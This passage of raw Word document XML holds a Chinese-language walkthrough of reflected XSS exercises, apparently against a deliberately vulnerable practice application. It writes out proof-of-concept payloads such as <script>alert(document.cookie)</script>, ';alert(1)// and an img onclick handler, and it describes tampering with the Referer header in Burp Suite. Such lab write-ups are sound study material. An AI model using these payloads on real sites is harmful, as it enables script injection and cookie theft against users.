          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04CEB537" wp14:editId="1AB18A32">
            <wp:extent cx="5274310" cy="2540635"/>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2540635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18358470" w14:textId="74425A44" w:rsidR="0093787E" w:rsidRPr="006758D8" w:rsidRDefault="0093787E" w:rsidP="0093787E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨站脚本攻击(</w:t>
      </w:r>
      <w:r>
        <w:t>XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F792789" w14:textId="6943CA83" w:rsidR="003C2A00" w:rsidRDefault="0093787E" w:rsidP="0093787E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反射型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BCEA3D" w14:textId="58E1E3C5" w:rsidR="0093787E" w:rsidRDefault="0093787E" w:rsidP="0093787E">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:t>ET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEBE4F0" w14:textId="4654570E" w:rsidR="0093787E" w:rsidRDefault="00E342E5" w:rsidP="0093787E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先测试一波，试下效果，</w:t>
      </w:r>
      <w:r w:rsidR="0093787E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接在登录框里输入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本</w:t>
      </w:r>
      <w:r w:rsidRPr="00E342E5">
        <w:t>&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E342E5">
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E342E5">
        <w:t>)&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后就不小心成功了哈哈哈哈</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EBC9C1" w14:textId="4BB2586E" w:rsidR="00E342E5" w:rsidRPr="0093787E" w:rsidRDefault="00E342E5" w:rsidP="0093787E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13F74B7B" wp14:editId="782E399E">
            <wp:extent cx="5274310" cy="1790700"/>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1790700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E5FB01" w14:textId="36E3B845" w:rsidR="0093787E" w:rsidRDefault="00E342E5" w:rsidP="00E342E5">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>OST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACC19B7" w14:textId="048380A9" w:rsidR="001505A1" w:rsidRDefault="00E342E5" w:rsidP="0093787E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原理和G</w:t>
      </w:r>
      <w:r>
        <w:t>ET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>型一样，只不过</w:t>
      </w:r>
      <w:r w:rsidR="001505A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="001505A1">
        <w:t>TTP</w:t>
      </w:r>
      <w:r w:rsidR="001505A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式</w:t>
      </w:r>
      <w:r w:rsidR="001505A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变为了P</w:t>
      </w:r>
      <w:r w:rsidR="001505A1">
        <w:t>OST</w:t>
      </w:r>
      <w:r w:rsidR="001505A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，用burp</w:t>
      </w:r>
      <w:r w:rsidR="001505A1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001505A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>suite改</w:t>
      </w:r>
      <w:r w:rsidR="00806689">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidR="001505A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就行了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4F72F0" w14:textId="55D746C0" w:rsidR="001505A1" w:rsidRDefault="001505A1" w:rsidP="0093787E"/>
    <w:p w14:paraId="3EC2250B" w14:textId="0DA1AE6F" w:rsidR="001505A1" w:rsidRDefault="001505A1" w:rsidP="001505A1">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>J</w:t>
      </w:r>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00073750">
        <w:t>ON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A96388" w14:textId="43EB909C" w:rsidR="00073750" w:rsidRPr="00073750" w:rsidRDefault="00073750" w:rsidP="00073750">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>随便输入测试数据，根据网页回显的数据，查看网页源代码可以进行</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A2FC56" w14:textId="0690C544" w:rsidR="001505A1" w:rsidRDefault="00073750" w:rsidP="001505A1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57F4DA53" wp14:editId="606AA480">
            <wp:extent cx="5274310" cy="1107440"/>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1107440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEC66B7" w14:textId="685B04A3" w:rsidR="00073750" w:rsidRDefault="00073750" w:rsidP="001505A1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据建设语法规则，在输出框内输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00073750">
        <w:t>';alert(1)//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CDC58C" w14:textId="75E3E815" w:rsidR="00073750" w:rsidRDefault="00073750" w:rsidP="001505A1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71F7FA70" wp14:editId="22DFE62B">
            <wp:extent cx="5274310" cy="2537460"/>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2537460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="434B746D" w14:textId="40BE4ABF" w:rsidR="0037618D" w:rsidRDefault="0037618D" w:rsidP="001505A1"/>
    <w:p w14:paraId="5F46505C" w14:textId="2785C47F" w:rsidR="0037618D" w:rsidRDefault="0037618D" w:rsidP="001505A1"/>
    <w:p w14:paraId="51D00544" w14:textId="7E6A165B" w:rsidR="0037618D" w:rsidRDefault="00FB26CE" w:rsidP="00FB26CE">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>AJAX/JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E8A468" w14:textId="656B28E5" w:rsidR="00FB26CE" w:rsidRPr="00FB26CE" w:rsidRDefault="00FB26CE" w:rsidP="00FB26CE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加入普通的&lt;</w:t>
      </w:r>
      <w:r>
        <w:t>script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标签脚本执行失败，输入&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=# onclick=alert(1)&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功执行脚本。</w:t>
      </w:r>
      <w:r w:rsidR="00806689">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里应该是需要利用ajax请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027EF9BA" w14:textId="5B0CCA2F" w:rsidR="00FB26CE" w:rsidRDefault="00FB26CE" w:rsidP="001505A1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FBF8827" wp14:editId="7FF1E84F">
            <wp:extent cx="5274310" cy="2830195"/>
            <wp:effectExtent l="0" t="0" r="2540" b="825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2830195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78279169" w14:textId="3007210F" w:rsidR="00FB26CE" w:rsidRDefault="00AC2324" w:rsidP="00AC2324">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>JAX/XML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8C19E3" w14:textId="352DD718" w:rsidR="00AC2324" w:rsidRDefault="00AC2324" w:rsidP="00AC2324">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06D43D5B" wp14:editId="2821D67A">
            <wp:extent cx="5274310" cy="2523490"/>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2523490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA18637" w14:textId="151BE3F9" w:rsidR="00AC2324" w:rsidRDefault="00AC2324" w:rsidP="00AC2324">
      <w:r w:rsidRPr="00AC2324">
        <w:t>xss_ajax_1-1.php</w:t>
      </w:r>
      <w:r w:rsidR="00F062A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中好像</w:t>
      </w:r>
      <w:r w:rsidR="00F062A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有进行数据</w:t>
      </w:r>
      <w:r w:rsidR="00F062A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互，所以没有直观的显示（我当初搞了半天也没搞出来，有大佬做出来还请分享分享）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A057516" w14:textId="6E69BE95" w:rsidR="00F062A9" w:rsidRDefault="00F062A9" w:rsidP="00AC2324"/>
    <w:p w14:paraId="69C1420D" w14:textId="360FEA87" w:rsidR="00F062A9" w:rsidRDefault="00F062A9" w:rsidP="00AC2324"/>
    <w:p w14:paraId="0B010361" w14:textId="0583977D" w:rsidR="00F062A9" w:rsidRPr="00F062A9" w:rsidRDefault="00F062A9" w:rsidP="00F062A9">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Back</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>otton</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4565FB69" w14:textId="14B5439F" w:rsidR="00F062A9" w:rsidRDefault="00862347" w:rsidP="00AC2324">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18C070C7" wp14:editId="3BB0279F">
            <wp:extent cx="5274310" cy="3728085"/>
            <wp:effectExtent l="0" t="0" r="2540" b="571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3728085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="349A790A" w14:textId="13A7EE3E" w:rsidR="00862347" w:rsidRDefault="00862347" w:rsidP="00AC2324">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试修改</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址为http://www.</w:t>
      </w:r>
      <w:r>
        <w:t>baidu.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，测试</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>botton</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>链接地址是否发生改变，从结果可以看到地址发生了变化，所以H</w:t>
      </w:r>
      <w:r>
        <w:t>TTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头部</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数可能存在X</w:t>
      </w:r>
      <w:r>
        <w:t>SS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE6224F" w14:textId="7571CC7C" w:rsidR="00F062A9" w:rsidRDefault="00862347" w:rsidP="00AC2324">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29BEA111" wp14:editId="21EA5C73">
            <wp:extent cx="5274310" cy="1951990"/>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1951990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32072D30" w14:textId="1510136B" w:rsidR="00F062A9" w:rsidRDefault="00862347" w:rsidP="00AC2324">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24C59A82" wp14:editId="0BE433D2">
            <wp:extent cx="5274310" cy="3244850"/>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3244850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA6AE75" w14:textId="2C6B8A7B" w:rsidR="00F062A9" w:rsidRDefault="00F062A9" w:rsidP="00AC2324"/>
    <w:p w14:paraId="34AC4EE0" w14:textId="3B7354A5" w:rsidR="00862347" w:rsidRDefault="00862347" w:rsidP="00AC2324">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52832498" wp14:editId="465C0D14">
            <wp:extent cx="5274310" cy="1951990"/>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1951990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20547C6F" w14:textId="1B423994" w:rsidR="00862347" w:rsidRDefault="00862347" w:rsidP="00AC2324">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14420978" wp14:editId="7675AB86">
            <wp:extent cx="5274310" cy="1859915"/>
            <wp:effectExtent l="0" t="0" r="2540" b="698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1859915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A7AD05" w14:textId="625B895C" w:rsidR="00862347" w:rsidRDefault="00862347" w:rsidP="00AC2324"/>
    <w:p w14:paraId="6CB171D9" w14:textId="6E699375" w:rsidR="00862347" w:rsidRDefault="00862347" w:rsidP="00AC2324"/>
    <w:p w14:paraId="634AD2A2" w14:textId="02235091" w:rsidR="00862347" w:rsidRDefault="008E6CB2" w:rsidP="008E6CB2">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Custom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E387E6" w14:textId="2564EBBA" w:rsidR="00862347" w:rsidRDefault="00862347" w:rsidP="00AC2324">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BB40A66" wp14:editId="0651296C">
            <wp:extent cx="5274310" cy="1231265"/>
            <wp:effectExtent l="0" t="0" r="2540" b="698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1231265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF8C547" w14:textId="436B5642" w:rsidR="00862347" w:rsidRDefault="00862347" w:rsidP="00AC2324">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07D8F53A" wp14:editId="0920F2DC">
            <wp:extent cx="5274310" cy="1991360"/>
            <wp:effectExtent l="0" t="0" r="2540" b="889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1991360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1799B981" w14:textId="1FD675B0" w:rsidR="00862347" w:rsidRDefault="00862347" w:rsidP="00AC2324"/>
    <w:p w14:paraId="64D43BBF" w14:textId="463D943A" w:rsidR="008E6CB2" w:rsidRDefault="00655141" w:rsidP="00655141">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>val</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022DD526" w14:textId="74E4D222" w:rsidR="008E6CB2" w:rsidRDefault="008E6CB2" w:rsidP="00AC2324">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C933D1D" wp14:editId="76C08E18">
            <wp:extent cx="5274310" cy="3282315"/>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3282315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="095E69AD" w14:textId="0F9D70C6" w:rsidR="00655141" w:rsidRDefault="00655141" w:rsidP="00AC2324">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25FC219D" wp14:editId="38FC2958">
            <wp:extent cx="5274310" cy="2646680"/>
            <wp:effectExtent l="0" t="0" r="2540" b="127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2646680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ECDA62" w14:textId="308282A5" w:rsidR="00655141" w:rsidRDefault="008E6CB2" w:rsidP="00AC2324">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0137444B" wp14:editId="51E5367D">
            <wp:extent cx="5274310" cy="2613660"/>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2613660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D21D20F" w14:textId="24AFB62E" w:rsidR="00655141" w:rsidRDefault="00655141" w:rsidP="00655141">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:t>REF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41946E8F" w14:textId="598F4F98" w:rsidR="00655141" w:rsidRDefault="00655141" w:rsidP="00AC2324">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69ED72ED" wp14:editId="342293F9">
            <wp:extent cx="5274310" cy="3337560"/>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3337560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBEA487" w14:textId="387EDBF6" w:rsidR="00655141" w:rsidRDefault="00655141" w:rsidP="00AC2324">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75C9326C" wp14:editId="24B4AD56">
            <wp:extent cx="5274310" cy="1032510"/>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1032510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CBE75E" w14:textId="4CC36E09" w:rsidR="00655141" w:rsidRDefault="00655141" w:rsidP="00AC2324">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00613C4B" wp14:editId="7BB06830">
            <wp:extent cx="5274310" cy="3287395"/>
            <wp:effectExtent l="0" t="0" r="2540" b="825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3287395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2455CD66" w14:textId="0AB5856B" w:rsidR="00655141" w:rsidRDefault="00655141" w:rsidP="00AC2324"/>
    <w:p w14:paraId="70CC18A9" w14:textId="31E29DEE" w:rsidR="00655141" w:rsidRDefault="00EB4BE8" w:rsidP="00EB4BE8">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Login</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>orm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603F1A9A" w14:textId="4B6DFA39" w:rsidR="00655141" w:rsidRDefault="00EB4BE8" w:rsidP="00AC2324">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>待更新</w:t>
      </w:r>
      <w:r>
        <w:t>……</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB60D18" w14:textId="55253A97" w:rsidR="00655141" w:rsidRDefault="00655141" w:rsidP="00AC2324"/>
    <w:p w14:paraId="6B07F3FC" w14:textId="29FC1D80" w:rsidR="00CE0FD7" w:rsidRDefault="00EB4BE8" w:rsidP="00CE0FD7">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
